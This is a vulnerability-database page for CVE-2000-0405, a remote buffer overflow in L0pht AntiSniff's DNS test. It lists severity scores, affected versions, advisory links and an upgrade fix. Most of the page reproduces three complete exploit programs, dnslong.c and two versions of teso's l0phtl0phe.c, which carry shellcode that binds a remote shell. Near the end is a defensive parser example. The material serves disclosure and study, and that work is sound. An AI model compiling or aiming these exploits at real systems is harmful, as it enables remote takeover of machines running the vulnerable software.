CVE-2000-0405
CVSS 10.0
Published: 2000-05-16 00:00:00
Revised: 2008-09-10 15:04:35

[Original] Buffer overflow in L0pht AntiSniff allows remote attackers to execute arbitrary commands via a malformed DNS response packet.


[CNNVD] AntiSniff DNS buffer overflow vulnerability. (CNNVD-200005-060)

L0pht AntiSniff has a buffer overflow vulnerability; a remote attacker can execute arbitrary commands via a malformed DNS response packet.

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:atstake:antisniff:1.0::researchers
cpe:/a:atstake:antisniff:1.0.1

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0405
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0405
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-060
(official data source) CNNVD

- Other links and resources

http://www.l0pht.com/advisories/asniff_advisory.txt
(VENDOR_ADVISORY)  L0PHT  20000515 AntiSniff version 1.01 and Researchers version 1 DNS overflow
http://www.securityfocus.com/bid/1207
(UNKNOWN)  BID  1207
http://www.osvdb.org/3179
(UNKNOWN)  OSVDB  3179

- Vulnerability information

AntiSniff DNS buffer overflow vulnerability.
Critical  Buffer overflow
2000-05-16 00:00:00 2005-05-02 00:00:00
Remote / Local
L0pht AntiSniff has a buffer overflow vulnerability; a remote attacker can execute arbitrary commands via a malformed DNS response packet.

- Advisories and patches

Immediate Solution:
Do not run the DNS tests on AntiSniff version 1.01 or the Researchers version 1.0. Download the newer version from
http://www.l0pht.com/antisniff which are labeled AntiSniff version 1.02 for the commercial instance and AntiSniff version 1-1 for the researchers instance.

@Stake AntiSniff - Researchers Version 1.0
@Stake AntiSniff 1.0.1

- Vulnerability information (19916)

Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (1) (EDBID:19916)
multiple remote
2000-05-16 Verified
0 Hugo Breton
N/A
source: http://www.securityfocus.com/bid/1207/info

Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.

This scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.

NOTE: 

This information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.

/* dnslong.c by Hugo Breton (bretonh@pgci.ca)

   This program must be run in the DNS test phase of Sentinel and Anti Sniff.
   It illustrates how code can be run remotely on a Win98 machine running Anti
   Sniff.

   Suggested arguments are:
   
   "dnslong host 5 65" to send the Windows 98 version of Anti Sniff in an
   infinite loop.
   "dnslong host 2 255" to segfault the oBSD version of Anti Sniff.
   "dnslong host 1 255" to segfault Sentinel.
*/


#include <stdio.h>
#include <stdlib.h>     /* atoi */
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>  /* inet_addr */

int main(int argc,char * * argv)
{
        char p[1024];
        int sock,i,j,k,len,labelnum,labellen;
        struct sockaddr_in sin;
        struct hostent * hoste;

        printf("dnslong.c by Hugo Breton (bretonh@pgci.ca)\n");

        if(argc<4)
        {
                printf("usage: %s host label_count label_length\n",argv[0]);
                return(0);
        }

        bzero((void *) &sin,sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=htons(53);

        if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                if((hoste=gethostbyname(argv[1]))==NULL)
                {
                        printf("unknown host %s\n",argv[1]);
                        return(0);
                }
                
                bcopy(hoste->h_addr,&sin.sin_addr.s_addr,4);
        }

        labelnum=atoi(argv[2]);
        labellen=atoi(argv[3]);

        len=labelnum*(labellen+1)+5+12;

        if(len>1024)
        {
                printf("resulting packet will be too long\n");
                return(0);
        }

        bzero((void *) p,1024);
        * ((unsigned short *) (p+0))=htons(867-5309);
        * ((unsigned short *) (p+4))=htons(1);
        
        for(i=12,j=0;j<labelnum;j++)
        {
                * ((unsigned char *) (p+(i++)))=labellen;

                for(k=0;k<labellen;k++,i++)
                {
                        * ((unsigned char *) (p+i))=0x90;
                }
                
                * ((unsigned char *) (p+i-2))=0xeb; /* jmp $-2 */
                * ((unsigned char *) (p+i-1))=0xfe; /* just make it loop */
        }

        * ((unsigned char *) (p+269))=0x20;
        * ((unsigned char *) (p+270))=0xff;
        * ((unsigned char *) (p+271))=0x87; 
        * ((unsigned char *) (p+272))=0x01; /* new EIP */

        * ((unsigned char *) (p+(i++)))=0;

        * ((unsigned short *) (p+i))=htons(1);
        * ((unsigned short *) (p+i+2))=htons(1);

        if((sock=socket(AF_INET,SOCK_DGRAM,0))==-1)
        {
                printf("unable to create UDP socket\n");
                return(0);
        }

        if(sendto(sock,p,len,0,(struct sockaddr *) &sin,sizeof(sin))==-1)
        {
                printf("unable to send packet\n");
                return(0);
        }

        printf("packet sent to host %s\n",argv[1]);

        return(0);
}

- Vulnerability information (19917)

Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (2) (EDBID:19917)
multiple remote
2000-05-16 Verified
0 L0pht
N/A
source: http://www.securityfocus.com/bid/1207/info
 

/* l0phtl0phe.c - antisniff exploit (1.02 included)
 *
 * -sc/teso
 *
 * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
 *
 * description:
 * l0pht messed up the fix for their problem in antisniff by not regarding
 * the type signedness properties of the char and int values used. this
 * results in a cool method bypassing the two extra checks (length + strncat).
 * some work on this topic have been done by mixter, (bad results on type
 * casting), but it should be obvious to any security conscious programmers.
 * i'm not stating that they aren't allowed errors, but they should fix it
 * for sure if they're going to fix it at all.  -sc.
 *
 * greetings to all teso, lam3rz, hert, adm, w00w00 and lds ppl.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memcpy, strlen */
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>


#define	OFFSET		0xbffef9a0

unsigned int	build_xp (unsigned char *xp);


int
main (int argc, char *argv[])
{
	int		sock;		/* raw socket */
	u_long		src_ip,
			dst_ip;

	unsigned char	xpbuf[512];	/* this one gets complicated now */
	unsigned char	tpack[512];	/* packet buffer */
	unsigned int	pl_len;


	if (argc != 3) {
		printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);

		exit (EXIT_FAILURE);
	}

	sock = libnet_open_raw_sock (IPPROTO_RAW);
	if (sock == -1) {
		perror ("libnet_open_raw_sock");
		exit (EXIT_FAILURE);
	}

	src_ip  = libnet_name_resolve (argv[1], 0);
	dst_ip  = libnet_name_resolve (argv[2], 0);

	pl_len = build_xp (xpbuf);

	libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
		src_ip, dst_ip, NULL, 0, tpack);
	libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
		tpack + IP_H);
	libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
		xpbuf, pl_len, tpack + IP_H + UDP_H);
	libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);

	/* they use "udp and dst port 53" as bpf, so we should have no problem
	 */
	libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
	libnet_close_raw_sock (sock);

	printf ("exploitation succeeded.\n");
	printf ("try: \"telnet %s 17664\" now.\n", argv[2]);

	exit (EXIT_SUCCESS);
}


/* build_xp
 *
 * build exploit buffer into buffer pointed to by `xp'.
 */

unsigned int
build_xp (unsigned char *xp)
{




	/* yea yea ugly buffer ;-) */
	unsigned char	buf[] =
		"\x7c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\xeb\x01"
		"\x7d\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\xeb\x08\x00"
		"\xfe\x10\x10\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\xeb\x20"
		"\x90\x90\x90\x90"
		"\x3c\xf8\xfe\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

		/* portshell 17644 portshellcode by smiler & scut */
		"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
		"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
		"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
		"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
		"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
		"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
		"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
		"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
		"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
		"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
		"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
		"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
		"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

	buf[287] = (OFFSET      ) & 0xff;
	buf[288] = (OFFSET >>  8) & 0xff;
	buf[289] = (OFFSET >> 16) & 0xff;
	buf[290] = (OFFSET >> 24) & 0xff;

	memcpy (xp, buf, sizeof (buf));

	return (sizeof (buf));
}

- Vulnerability information (19918)

Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (3) (EDBID:19918)
multiple remote
2000-05-16 Verified
0 L0pht
N/A
source: http://www.securityfocus.com/bid/1207/info
  



/* l0phtl0phe.c - antisniff exploit (1-1-1 "second fixed version" included)
 *
 * -scut/teso
 *
 * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
 *
 * description:
 * l0pht messed up the fix for their problem in antisniff by not regarding
 * the type signedness properties of the char and int values used. this
 * results in a cool method bypassing the two extra checks (length + strncat).
 * some work on this topic have been done by mixter, (bad results on type
 * casting), but it should be obvious to any security conscious programmers.
 * i'm not stating that they aren't allowed errors, but they should fix it
 * for sure if they're going to fix it at all.  -sc.
 *
 * 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
 *
 * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memcpy, strlen */
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>


#define	OFFSET		0xbffef9a0

unsigned int	build_xp (unsigned char *xp);


int
main (int argc, char *argv[])
{
	int		sock;		/* raw socket */
	u_long		src_ip,
			dst_ip;

	unsigned char	xpbuf[1024];	/* this one gets complicated now */
	unsigned char	tpack[2048];	/* packet buffer */
	unsigned int	pl_len;


	if (argc != 3) {
		printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);

		exit (EXIT_FAILURE);
	}

	sock = libnet_open_raw_sock (IPPROTO_RAW);
	if (sock == -1) {
		perror ("libnet_open_raw_sock");
		exit (EXIT_FAILURE);
	}

	src_ip  = libnet_name_resolve (argv[1], 0);
	dst_ip  = libnet_name_resolve (argv[2], 0);

	pl_len = build_xp (xpbuf);

	libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
		src_ip, dst_ip, NULL, 0, tpack);
	libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
		tpack + IP_H);
	libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
		xpbuf, pl_len, tpack + IP_H + UDP_H);
	libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);

	/* they use "udp and dst port 53" as bpf, so we should have no problem
	 */
	libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
	libnet_close_raw_sock (sock);

	printf ("exploitation succeeded.\n");
	printf ("try: \"telnet %s 17664\" now.\n", argv[2]);

	exit (EXIT_SUCCESS);
}


/* build_xp
 *
 * build exploit buffer into buffer pointed to by `xp'.
 */

unsigned int
build_xp (unsigned char *xp)
{
	int		i;
	unsigned char	buf[1024];
	unsigned char	shellcode[] =
		/* portshell 17644 portshellcode by smiler & scut */
		"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
		"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
		"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
		"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
		"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
		"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
		"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
		"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
		"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
		"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
		"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
		"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
		"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

	unsigned char	head[] =
		"\x07-7350-\x00\xfe";

	memcpy (buf, head, 9);
	for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)
		buf[i] = '\x90';
	memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,
		strlen (shellcode));

	buf[272] = '\xeb';
	buf[273] = '\x08';
	buf[274] = (OFFSET      ) & 0xff;
	buf[275] = (OFFSET >>  8) & 0xff;
	buf[276] = (OFFSET >> 16) & 0xff;
	buf[277] = (OFFSET >> 24) & 0xff;

	memcpy (xp, buf, sizeof (buf));

	return (sizeof (buf));
}

- Vulnerability information

3179
AntiSniff DNS Overflow Remote Code Execution
Remote / Network Access; Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

AntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests performed not properly validating input on incoming packets. A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.
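The description above attributes the overflow to a DNS-test packet whose name labels ignore the protocol limits, and the teso header earlier on this page notes that the first fix was undone by treating the length value as signed. The following is an added defensive example, not code from AntiSniff or from either advisory: a bounds-checked QNAME parser (`parse_qname`, an assumed name) that reads each length octet as unsigned and enforces the RFC 1035 limits before copying, plus `signed_check_bypassed`, which shows how a signed-char comparison lets an oversized length through. The sample packets are constructed here, not captured traffic.

```c
/* Defensive DNS QNAME parser: length octets are unsigned, every read is
 * bounds-checked against the packet, and RFC 1035 limits (63 bytes per
 * label, 255 per name) are enforced before any copy. Added example. */
#include <stdint.h>
#include <string.h>

#define MAX_LABEL 63
#define MAX_NAME  255

/* The trap the teso note describes: a length octet stored in a signed char
 * turns 0xff into -1, which passes "len <= 63". Returns 1 if bypassed. */
int signed_check_bypassed(uint8_t len_octet)
{
    signed char len = (signed char)len_octet;   /* wrong type, on purpose */
    return len <= MAX_LABEL;
}

/* Parses the name at pkt[off]. Returns bytes consumed, or -1 on any
 * violation. out receives the dotted name. Compression pointers (0xC0) and
 * the reserved 0x40/0x80 label types are rejected along with lengths > 63. */
int parse_qname(const uint8_t *pkt, size_t pkt_len, size_t off,
                char *out, size_t out_len)
{
    size_t pos = off, o = 0, total = 0;

    for (;;) {
        if (pos >= pkt_len) return -1;          /* length octet missing */
        uint8_t len = pkt[pos++];               /* unsigned: 0xff is 255 */
        if (len == 0) break;                    /* root label ends the name */
        if (len > MAX_LABEL) return -1;         /* covers 0x40..0xff */
        total += len + 1;
        if (total > MAX_NAME) return -1;        /* whole-name limit */
        if (len > pkt_len - pos) return -1;     /* label runs off the packet */
        if (o + len + 2 > out_len) return -1;   /* room for '.', label, NUL */
        if (o) out[o++] = '.';
        memcpy(out + o, pkt + pos, len);
        o += len;
        pos += len;
    }
    out[o] = '\0';
    return (int)(pos - off);
}

/* Constructed sample question names (not captured traffic). */
static const uint8_t good_q[]  = {3,'w','w','w',7,'e','x','a','m','p','l','e',3,'c','o','m',0};
static const uint8_t long_q[]  = {0xff, 0x90, 0x90, 0x90};  /* oversized label */
static const uint8_t trunc_q[] = {5, 'a', 'b'};             /* claims 5, has 2 */

int check_good(void)      /* 1 when "www.example.com" parses from 17 bytes */
{
    char n[256];
    return parse_qname(good_q, sizeof good_q, 0, n, sizeof n) == 17
        && strcmp(n, "www.example.com") == 0;
}
int check_oversized(void) { char n[256]; return parse_qname(long_q, sizeof long_q, 0, n, sizeof n); }
int check_truncated(void) { char n[256]; return parse_qname(trunc_q, sizeof trunc_q, 0, n, sizeof n); }
```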

- Timeline

2000-05-15 Unknown
2000-05-15 Unknown

- Solution

Upgrade to version 1.02 or higher, as it has been reported to fix this vulnerability. Users may also install the vendor provided patch that mitigates this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
